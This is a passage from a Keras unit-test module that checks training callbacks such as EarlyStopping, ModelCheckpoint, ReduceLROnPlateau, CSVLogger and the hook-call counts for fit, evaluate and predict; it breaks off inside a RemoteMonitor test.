from keras.layers import BatchNormalization
from keras.utils.test_utils import get_test_data
from keras.utils.generic_utils import to_list
from keras.utils.generic_utils import unpack_singleton
from keras import backend as K
from keras.utils import np_utils
try:
from unittest.mock import patch
except ImportError:
from mock import patch
# Tiny model/data sizes keep every test in this module fast.
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
def data_generator(x, y, batch_size):
    """Yield (x_batch, y_batch) pairs forever, cycling over the data in order."""
    x = to_list(x)
    y = to_list(y)
    batches_per_epoch = len(x[0]) // batch_size
    index = 0
    while True:
        lo = index * batch_size
        hi = lo + batch_size
        x_batch = unpack_singleton([array[lo:hi] for array in x])
        y_batch = unpack_singleton([array[lo:hi] for array in y])
        yield x_batch, y_batch
        index = (index + 1) % batches_per_epoch
# Changing the default arguments of get_test_data.
def get_data_callbacks(num_train=train_samples,
                       num_test=test_samples,
                       input_shape=(input_dim,),
                       classification=True,
                       num_classes=num_classes):
    """Return ((X_train, y_train), (X_test, y_test)) sized for these tests."""
    return get_test_data(num_train=num_train,
                         num_test=num_test,
                         input_shape=input_shape,
                         classification=classification,
                         num_classes=num_classes)
class Counter(callbacks.Callback):
    """Counts the number of times each callback method was run.

    # Arguments
        method_counts: dict, contains the counts of times
            each callback method was run.
    """

    # Every hook the Keras callback machinery may invoke.
    _HOOKS = (
        'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
        'on_train_batch_begin', 'on_train_batch_end',
        'on_test_batch_begin', 'on_test_batch_end',
        'on_predict_batch_begin', 'on_predict_batch_end',
        'on_train_begin', 'on_train_end',
        'on_predict_begin', 'on_predict_end',
        'on_test_begin', 'on_test_end',
    )

    def __init__(self):
        self.method_counts = defaultdict(int)
        # Shadow each hook on the instance with a counting wrapper around
        # the inherited implementation.
        for hook in self._HOOKS:
            setattr(self, hook,
                    self.wrap_with_counts(hook, getattr(self, hook)))

    def wrap_with_counts(self, method_name, method):
        """Return `method` wrapped so every call bumps method_counts[method_name]."""
        def _counting_proxy(*args, **kwargs):
            self.method_counts[method_name] += 1
            return method(*args, **kwargs)
        return _counting_proxy
class TestCallbackCounts(object):
    """Verifies that each Keras API entry point fires exactly the expected
    callback hooks the expected number of times."""

    def _check_counts(self, counter, expected_counts):
        """Checks that counts registered by `counter` are those expected."""
        for method_name, expected_count in expected_counts.items():
            count = counter.method_counts[method_name]
            assert count == expected_count, \
                'For method {}: expected {}, got: {}'.format(
                    method_name, expected_count, count)

    def _get_model(self):
        """Build a minimal two-layer classifier used by all the tests below."""
        layers = [
            Dense(10, activation='relu', input_dim=input_dim),
            Dense(num_classes, activation='softmax')
        ]
        model = Sequential(layers=layers)
        model.compile(optimizer='adam', loss='binary_crossentropy')
        return model

    def test_callback_hooks_are_called_in_fit(self):
        """fit: 10 samples / batch 2 / 5 epochs -> 25 train batches, 10 val batches."""
        np.random.seed(1337)
        (X_train, y_train), (X_test, y_test) = get_data_callbacks(num_train=10,
                                                                  num_test=4)
        y_train = np_utils.to_categorical(y_train)
        y_test = np_utils.to_categorical(y_test)
        model = self._get_model()
        counter = Counter()
        model.fit(X_train, y_train, validation_data=(X_test, y_test),
                  batch_size=2, epochs=5, callbacks=[counter])
        self._check_counts(
            counter, {
                'on_batch_begin': 25,
                'on_batch_end': 25,
                'on_epoch_begin': 5,
                'on_epoch_end': 5,
                'on_predict_batch_begin': 0,
                'on_predict_batch_end': 0,
                'on_predict_begin': 0,
                'on_predict_end': 0,
                'on_test_batch_begin': 10,
                'on_test_batch_end': 10,
                'on_test_begin': 5,
                'on_test_end': 5,
                'on_train_batch_begin': 25,
                'on_train_batch_end': 25,
                'on_train_begin': 1,
                'on_train_end': 1,
            })

    def test_callback_hooks_are_called_in_evaluate(self):
        """evaluate: only test hooks fire; 10 samples / batch 2 -> 5 batches."""
        np.random.seed(1337)
        (_, _), (X_test, y_test) = get_data_callbacks(num_test=10)
        y_test = np_utils.to_categorical(y_test)
        model = self._get_model()
        counter = Counter()
        model.evaluate(X_test, y_test, batch_size=2, callbacks=[counter])
        self._check_counts(
            counter, {
                'on_test_batch_begin': 5,
                'on_test_batch_end': 5,
                'on_test_begin': 1,
                'on_test_end': 1,
                'on_batch_begin': 0,
                'on_batch_end': 0,
                'on_epoch_begin': 0,
                'on_epoch_end': 0,
                'on_predict_batch_begin': 0,
                'on_predict_batch_end': 0,
                'on_predict_begin': 0,
                'on_predict_end': 0,
                'on_train_batch_begin': 0,
                'on_train_batch_end': 0,
                'on_train_begin': 0,
                'on_train_end': 0,
            })

    def test_callback_hooks_are_called_in_predict(self):
        """predict: only predict hooks fire; 10 samples / batch 2 -> 5 batches."""
        np.random.seed(1337)
        (_, _), (X_test, _) = get_data_callbacks(num_test=10)
        model = self._get_model()
        counter = Counter()
        model.predict(X_test, batch_size=2, callbacks=[counter])
        self._check_counts(
            counter, {
                'on_predict_batch_begin': 5,
                'on_predict_batch_end': 5,
                'on_predict_begin': 1,
                'on_predict_end': 1,
                'on_batch_begin': 0,
                'on_batch_end': 0,
                'on_epoch_begin': 0,
                'on_epoch_end': 0,
                'on_test_batch_begin': 0,
                'on_test_batch_end': 0,
                'on_test_begin': 0,
                'on_test_end': 0,
                'on_train_batch_begin': 0,
                'on_train_batch_end': 0,
                'on_train_begin': 0,
                'on_train_end': 0,
            })

    def test_callback_hooks_are_called_in_fit_generator(self):
        """fit_generator must match fit's hook counts for equivalent data."""
        np.random.seed(1337)
        (X_train, y_train), (X_test, y_test) = get_data_callbacks(num_train=10,
                                                                  num_test=4)
        y_train = np_utils.to_categorical(y_train)
        y_test = np_utils.to_categorical(y_test)
        train_generator = data_generator(X_train, y_train, batch_size=2)
        validation_generator = data_generator(X_test, y_test, batch_size=2)
        model = self._get_model()
        counter = Counter()
        model.fit_generator(train_generator,
                            steps_per_epoch=len(X_train) // 2,
                            epochs=5,
                            validation_data=validation_generator,
                            validation_steps=len(X_test) // 2,
                            callbacks=[counter])
        self._check_counts(
            counter, {
                'on_batch_begin': 25,
                'on_batch_end': 25,
                'on_epoch_begin': 5,
                'on_epoch_end': 5,
                'on_predict_batch_begin': 0,
                'on_predict_batch_end': 0,
                'on_predict_begin': 0,
                'on_predict_end': 0,
                'on_test_batch_begin': 10,
                'on_test_batch_end': 10,
                'on_test_begin': 5,
                'on_test_end': 5,
                'on_train_batch_begin': 25,
                'on_train_batch_end': 25,
                'on_train_begin': 1,
                'on_train_end': 1,
            })

    def test_callback_hooks_are_called_in_evaluate_generator(self):
        """evaluate_generator must match evaluate's hook counts."""
        np.random.seed(1337)
        (_, _), (X_test, y_test) = get_data_callbacks(num_test=10)
        y_test = np_utils.to_categorical(y_test)
        model = self._get_model()
        counter = Counter()
        model.evaluate_generator(data_generator(X_test, y_test, batch_size=2),
                                 steps=len(X_test) // 2, callbacks=[counter])
        self._check_counts(
            counter, {
                'on_test_batch_begin': 5,
                'on_test_batch_end': 5,
                'on_test_begin': 1,
                'on_test_end': 1,
                'on_batch_begin': 0,
                'on_batch_end': 0,
                'on_epoch_begin': 0,
                'on_epoch_end': 0,
                'on_predict_batch_begin': 0,
                'on_predict_batch_end': 0,
                'on_predict_begin': 0,
                'on_predict_end': 0,
                'on_train_batch_begin': 0,
                'on_train_batch_end': 0,
                'on_train_begin': 0,
                'on_train_end': 0,
            })

    def test_callback_hooks_are_called_in_predict_generator(self):
        """predict_generator must match predict's hook counts."""
        np.random.seed(1337)
        (_, _), (X_test, _) = get_data_callbacks(num_test=10)

        # Local x-only generator (the module-level one yields (x, y) pairs).
        def data_generator(x, batch_size):
            x = to_list(x)
            max_batch_index = len(x[0]) // batch_size
            i = 0
            while 1:
                x_batch = [
                    array[i * batch_size: (i + 1) * batch_size] for array in x]
                x_batch = unpack_singleton(x_batch)
                yield x_batch
                i += 1
                i = i % max_batch_index

        model = self._get_model()
        counter = Counter()
        model.predict_generator(data_generator(X_test, batch_size=2),
                                steps=len(X_test) // 2, callbacks=[counter])
        self._check_counts(
            counter, {
                'on_predict_batch_begin': 5,
                'on_predict_batch_end': 5,
                'on_predict_begin': 1,
                'on_predict_end': 1,
                'on_batch_begin': 0,
                'on_batch_end': 0,
                'on_epoch_begin': 0,
                'on_epoch_end': 0,
                'on_test_batch_begin': 0,
                'on_test_batch_end': 0,
                'on_test_begin': 0,
                'on_test_end': 0,
                'on_train_batch_begin': 0,
                'on_train_batch_end': 0,
                'on_train_begin': 0,
                'on_train_end': 0,
            })

    def test_callback_list_methods(self):
        """CallbackList forwards the per-batch hooks to its callbacks."""
        counter = Counter()
        callback_list = callbacks.CallbackList([counter])
        batch = 0
        callback_list.on_test_batch_begin(batch)
        callback_list.on_test_batch_end(batch)
        callback_list.on_predict_batch_begin(batch)
        callback_list.on_predict_batch_end(batch)
        self._check_counts(
            counter, {
                'on_test_batch_begin': 1,
                'on_test_batch_end': 1,
                'on_predict_batch_begin': 1,
                'on_predict_batch_end': 1,
                'on_predict_begin': 0,
                'on_predict_end': 0,
                'on_batch_begin': 0,
                'on_batch_end': 0,
                'on_epoch_begin': 0,
                'on_epoch_end': 0,
                'on_test_begin': 0,
                'on_test_end': 0,
                'on_train_batch_begin': 0,
                'on_train_batch_end': 0,
                'on_train_begin': 0,
                'on_train_end': 0,
            })
def test_TerminateOnNaN():
    """TerminateOnNaN must stop training on the first epoch once loss blows up."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    cbks = [callbacks.TerminateOnNaN()]
    model = Sequential()
    # Huge constant initialization guarantees the loss overflows to inf/NaN.
    initializer = initializers.Constant(value=1e5)
    for _ in range(5):
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
                        kernel_initializer=initializer))
    model.add(Dense(num_classes, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')

    # case 1 fit
    history = model.fit(X_train, y_train,
                        batch_size=batch_size,
                        validation_data=(X_test, y_test),
                        callbacks=cbks,
                        epochs=20)
    loss = history.history['loss']
    assert len(loss) == 1
    assert loss[0] == np.inf

    # case 2: same behavior through fit_generator
    history = model.fit_generator(data_generator(X_train, y_train, batch_size),
                                  len(X_train),
                                  validation_data=(X_test, y_test),
                                  callbacks=cbks,
                                  epochs=20)
    loss = history.history['loss']
    assert len(loss) == 1
    assert loss[0] == np.inf or np.isnan(loss[0])
def test_stop_training_csv(tmpdir):
    """CSVLogger must still log the final (NaN) epoch when TerminateOnNaN stops training."""
    np.random.seed(1337)
    fp = str(tmpdir / 'test.csv')
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
    model = Sequential()
    for _ in range(5):
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')

    def data_generator():
        # Yields real data for 3 passes, then all-NaN batches to force termination.
        i = 0
        max_batch_index = len(X_train) // batch_size
        tot = 0
        while 1:
            if tot > 3 * len(X_train):
                yield (np.ones([batch_size, input_dim]) * np.nan,
                       np.ones([batch_size, num_classes]) * np.nan)
            else:
                yield (X_train[i * batch_size: (i + 1) * batch_size],
                       y_train[i * batch_size: (i + 1) * batch_size])
            i += 1
            tot += 1
            i = i % max_batch_index

    history = model.fit_generator(data_generator(),
                                  len(X_train) // batch_size,
                                  validation_data=(X_test, y_test),
                                  callbacks=cbks,
                                  epochs=20)
    loss = history.history['loss']
    assert len(loss) > 1
    assert loss[-1] == np.inf or np.isnan(loss[-1])

    values = []
    with open(fp) as f:
        for x in reader(f):
            values.append(x)
    # The NaN epoch must appear as the last logged row.
    assert 'nan' in values[-1], 'The last epoch was not logged.'
    os.remove(fp)
def test_ModelCheckpoint(tmpdir):
    """ModelCheckpoint: all mode/save_best_only/period combinations write files."""
    np.random.seed(1337)
    filepath = str(tmpdir / 'checkpoint.h5')
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    # case 1: default auto mode, save every epoch
    monitor = 'val_loss'
    save_best_only = False
    mode = 'auto'
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.isfile(filepath)
    os.remove(filepath)
    # case 2: explicit min mode
    mode = 'min'
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.isfile(filepath)
    os.remove(filepath)
    # case 3: max mode on an accuracy metric
    mode = 'max'
    monitor = 'val_accuracy'
    cbks = [callbacks.ModelCheckpoint(filepath,
                                      monitor=monitor,
                                      save_best_only=save_best_only,
                                      mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.isfile(filepath)
    os.remove(filepath)
    # case 4: save only on improvement
    save_best_only = True
    cbks = [callbacks.ModelCheckpoint(filepath,
                                      monitor=monitor,
                                      save_best_only=save_best_only,
                                      mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.isfile(filepath)
    os.remove(filepath)
    # case 5: period=2 saves only on even epochs
    # NOTE(review): this filepath is relative, so checkpoints land in the
    # current working directory, not tmpdir — which is why the final
    # `not tmpdir.listdir()` assertion still holds. Confirm intentional.
    save_best_only = False
    period = 2
    mode = 'auto'
    filepath = 'checkpoint.{epoch:02d}.h5'
    cbks = [callbacks.ModelCheckpoint(filepath,
                                      monitor=monitor,
                                      save_best_only=save_best_only,
                                      mode=mode,
                                      period=period)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
    assert os.path.isfile(filepath.format(epoch=2))
    assert os.path.isfile(filepath.format(epoch=4))
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=3))
    os.remove(filepath.format(epoch=2))
    os.remove(filepath.format(epoch=4))
    assert not tmpdir.listdir()
def test_EarlyStopping():
    """Smoke test: EarlyStopping runs in 'max' and 'auto' modes without error."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])
    # explicit max mode, zero patience
    mode = 'max'
    monitor = 'val_acc'
    patience = 0
    cbks = [callbacks.EarlyStopping(patience=patience,
                                    monitor=monitor,
                                    mode=mode)]
    history = model.fit(X_train, y_train,
                        batch_size=batch_size,
                        validation_data=(X_test, y_test),
                        callbacks=cbks,
                        epochs=20)
    # auto mode must infer 'max' from the 'acc' metric name
    mode = 'auto'
    monitor = 'val_acc'
    patience = 2
    cbks = [callbacks.EarlyStopping(patience=patience,
                                    monitor=monitor,
                                    mode=mode)]
    history = model.fit(X_train, y_train,
                        batch_size=batch_size,
                        validation_data=(X_test, y_test),
                        callbacks=cbks,
                        epochs=20)
def test_EarlyStopping_reuse():
    """The same EarlyStopping instance must reset its state between fit() calls."""
    np.random.seed(1337)
    patience = 3
    data = np.random.random((100, 1))
    labels = np.where(data > 0.5, 1, 0)
    model = Sequential((
        Dense(1, input_dim=1, activation='relu'),
        Dense(1, activation='sigmoid'),
    ))
    model.compile(optimizer='sgd',
                  loss='binary_crossentropy',
                  metrics=['accuracy'])
    stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
    weights = model.get_weights()
    hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
    assert len(hist.epoch) >= patience
    # This should allow training to go for at least `patience` epochs
    model.set_weights(weights)
    hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
    assert len(hist.epoch) >= patience
def test_EarlyStopping_patience():
    """Training stops `patience` epochs after the last improvement."""
    class DummyModel(object):
        # Minimal stand-in: EarlyStopping only toggles stop_training
        # and reads/writes weights.
        def __init__(self):
            self.stop_training = False

        def get_weights(self):
            return []

        def set_weights(self, weights):
            pass

    early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
    early_stop.model = DummyModel()
    losses = [0.0860, 0.1096, 0.1040, 0.1019]
    # Should stop after epoch 3,
    # as the loss has not improved after patience=2 epochs.
    epochs_trained = 0
    early_stop.on_train_begin()
    for epoch in range(len(losses)):
        epochs_trained += 1
        early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
        if early_stop.model.stop_training:
            break
    assert epochs_trained == 3
def test_EarlyStopping_baseline():
    """The baseline must be reached within `patience` epochs or training stops."""
    class DummyModel(object):
        def __init__(self):
            self.stop_training = False

        def get_weights(self):
            return []

        def set_weights(self, weights):
            pass

    def baseline_tester(acc_levels):
        # Drive EarlyStopping with a scripted accuracy curve and report
        # how many epochs ran before it stopped.
        early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75,
                                             patience=2)
        early_stop.model = DummyModel()
        epochs_trained = 0
        early_stop.on_train_begin()
        for epoch in range(len(acc_levels)):
            epochs_trained += 1
            early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]})
            if early_stop.model.stop_training:
                break
        return epochs_trained

    acc_levels = [0.55, 0.76, 0.81, 0.81]
    baseline_met = baseline_tester(acc_levels)
    acc_levels = [0.55, 0.74, 0.81, 0.81]
    baseline_not_met = baseline_tester(acc_levels)
    # All epochs should run because baseline was met in second epoch
    assert baseline_met == 4
    # Baseline was not met by second epoch and should stop
    assert baseline_not_met == 2
def test_EarlyStopping_final_weights():
    """Without restore_best_weights the model keeps its last-epoch weights."""
    class DummyModel(object):
        # Weights are modeled as a single int equal to the epoch number.
        def __init__(self):
            self.stop_training = False
            self.weights = -1

        def get_weights(self):
            return self.weights

        def set_weights(self, weights):
            self.weights = weights

        def set_weight_to_epoch(self, epoch):
            self.weights = epoch

    early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
    early_stop.model = DummyModel()
    losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    epochs_trained = 0
    early_stop.on_train_begin()
    for epoch in range(len(losses)):
        epochs_trained += 1
        early_stop.model.set_weight_to_epoch(epoch=epoch)
        early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
        if early_stop.model.stop_training:
            break
    # The best configuration is in the epoch 2 (loss = 0.1000),
    # so with patience=2 we need to end up at epoch 4
    assert early_stop.model.get_weights() == 4
def test_EarlyStopping_final_weights_when_restoring_model_weights():
    """With restore_best_weights=True the model ends with best-epoch weights."""
    class DummyModel(object):
        # Weights are modeled as a single int equal to the epoch number.
        def __init__(self):
            self.stop_training = False
            self.weights = -1

        def get_weights(self):
            return self.weights

        def set_weights(self, weights):
            self.weights = weights

        def set_weight_to_epoch(self, epoch):
            self.weights = epoch

    early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2,
                                         restore_best_weights=True)
    early_stop.model = DummyModel()
    losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in the epoch 2 (loss = 0.1000).
    epochs_trained = 0
    early_stop.on_train_begin()
    for epoch in range(len(losses)):
        epochs_trained += 1
        early_stop.model.set_weight_to_epoch(epoch=epoch)
        early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
        if early_stop.model.stop_training:
            break
    # The best configuration is in epoch 2 (loss = 0.1000),
    # and while patience = 2, we're restoring the best weights,
    # so we end up at the epoch with the best weights, i.e. epoch 2
    assert early_stop.model.get_weights() == 2
def test_LearningRateScheduler():
    """The scheduled lr after 5 epochs must be 1 / (1 + 4) = 0.2."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
    # BUGFIX: the original assertion had no abs(), so any lr *below* 0.2
    # (i.e. a wrong schedule) passed vacuously. Compare absolute deviation.
    assert abs(float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
    """min_delta controls whether the plateau detector fires and reduces lr."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    def make_model():
        # Fresh identically-seeded model per case so runs are comparable.
        np.random.seed(1337)
        model = Sequential()
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
        model.add(Dense(num_classes, activation='softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer=optimizers.SGD(lr=0.1),
                      metrics=['accuracy'])
        return model

    model = make_model()
    # This should reduce the LR after the first epoch (due to high epsilon).
    cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss',
                                        factor=0.1,
                                        min_delta=10,
                                        patience=1,
                                        cooldown=5)]
    model.fit(X_train, y_train,
              batch_size=batch_size,
              validation_data=(X_test, y_test),
              callbacks=cbks,
              epochs=5,
              verbose=2)
    assert_allclose(
        float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())

    # With min_delta=0 the loss keeps "improving", so lr stays at 0.1.
    model = make_model()
    cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
                                        min_delta=0, patience=1, cooldown=5)]
    model.fit(X_train, y_train,
              batch_size=batch_size,
              validation_data=(X_test, y_test),
              callbacks=cbks,
              epochs=5,
              verbose=2)
    assert_allclose(
        float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_ReduceLROnPlateau_patience():
    """lr is only reduced after `patience` epochs without improvement."""
    class DummyOptimizer(object):
        def __init__(self):
            self.lr = K.variable(1.0)

    class DummyModel(object):
        def __init__(self):
            self.optimizer = DummyOptimizer()

    reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss',
                                                    patience=2)
    reduce_on_plateau.model = DummyModel()
    losses = [0.0860, 0.1096, 0.1040]
    lrs = []
    for epoch in range(len(losses)):
        reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
        lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr))
    # The learning rates should be 1.0 except the last one
    assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0
def test_ReduceLROnPlateau_backwards_compatibility():
    """The deprecated `epsilon` kwarg must warn and map onto `min_delta`."""
    import warnings
    with warnings.catch_warnings(record=True) as ws:
        reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13)
    # Check if warnings are disabled
    if os.environ.get("PYTHONWARNINGS") != "ignore":
        assert "`epsilon` argument is deprecated" in str(ws[0].message)
    assert not hasattr(reduce_on_plateau, 'epsilon')
    assert hasattr(reduce_on_plateau, 'min_delta')
    assert reduce_on_plateau.min_delta == 1e-13
def test_CSVLogger(tmpdir):
    """CSVLogger must write one row per epoch with the configured separator,
    append to an existing file without duplicating the header, and remain
    usable across multiple fit() calls."""
    np.random.seed(1337)
    filepath = str(tmpdir / 'log.tsv')
    sep = '\t'
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    def make_model():
        # Re-seed so every model starts from identical initial weights.
        np.random.seed(1337)
        model = Sequential()
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
        model.add(Dense(num_classes, activation='softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer=optimizers.SGD(lr=0.1),
                      metrics=['accuracy'])
        return model

    # case 1, create new file with defined separator
    model = make_model()
    cbks = [callbacks.CSVLogger(filepath, separator=sep)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)

    assert os.path.isfile(filepath)
    with open(filepath) as csvfile:
        # Sniffer infers the CSV dialect; the delimiter must match `sep`.
        dialect = Sniffer().sniff(csvfile.read())
    assert dialect.delimiter == sep
    del model
    del cbks

    # case 2, append data to existing file, skip header
    model = make_model()
    cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)

    # case 3, reuse of CSVLogger object
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=2)

    import re
    with open(filepath) as csvfile:
        list_lines = csvfile.readlines()
        for line in list_lines:
            # 4 separators per row -> 5 fields (epoch + metrics).
            assert line.count(sep) == 4
        # 1 header + 4 epoch rows (1 + 1 + 2 epochs across the three fits).
        assert len(list_lines) == 5
        output = " ".join(list_lines)
        # The "epoch" header must appear exactly once despite appending.
        assert len(re.findall('epoch', output)) == 1
        os.remove(filepath)
        assert not tmpdir.listdir()
def test_CallbackValData():
    """Callbacks must receive identical validation data from fit() and
    fit_generator(), exposed as the (x, y, sample_weights) triple."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])

    # A no-op callback; only its captured `validation_data` is inspected.
    cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)

    cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
    train_generator = data_generator(X_train, y_train, batch_size)
    model.fit_generator(train_generator, len(X_train), epochs=1,
                        validation_data=(X_test, y_test),
                        callbacks=[cbk2])

    # callback validation data should always have x, y, and sample weights
    assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
    # x and y must be the very same arrays in both training paths.
    assert cbk.validation_data[0] is cbk2.validation_data[0]
    assert cbk.validation_data[1] is cbk2.validation_data[1]
    # Sample weights are synthesized per-fit, so only shapes must agree.
    assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
def test_LambdaCallback():
    """LambdaCallback's on_train_end hook must fire after training completes,
    verified here by letting the hook terminate a helper process."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])

    # Start an arbitrary process that should run during model training and
    # be terminated after training has completed.
    def f():
        while True:
            pass

    p = multiprocessing.Process(target=f)
    p.start()
    cleanup_callback = callbacks.LambdaCallback(
        on_train_end=lambda logs: p.terminate())

    cbks = [cleanup_callback]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
    # join() only returns after terminate() took effect, which proves the
    # on_train_end hook actually ran.
    p.join()
    assert not p.is_alive()
@pytest.mark.skipif(K.backend() != 'tensorflow', reason='Uses TensorBoard')
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
    """TensorBoard and ReduceLROnPlateau must be usable together in a single
    fit() call without error, producing the TensorBoard log directory."""
    import shutil
    # Deliberately random seed: this test checks co-existence, not values.
    np.random.seed(np.random.randint(1, 1e7))
    filepath = str(tmpdir / 'logs')

    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='binary_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])

    cbks = [
        callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.5,
            patience=4,
            verbose=1),
        callbacks.TensorBoard(
            log_dir=filepath)]

    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=2)

    assert os.path.isdir(filepath)
    shutil.rmtree(filepath)
    assert not tmpdir.listdir()
def tests_RemoteMonitor():
    """Training with a default RemoteMonitor must complete when the HTTP
    POSTs are mocked out; only the callback plumbing is under test."""
    (X_train, y_train), (X_test, y_test) = get_data_callbacks()
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)

    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(optimizer='rmsprop',
                  loss='categorical_crossentropy',
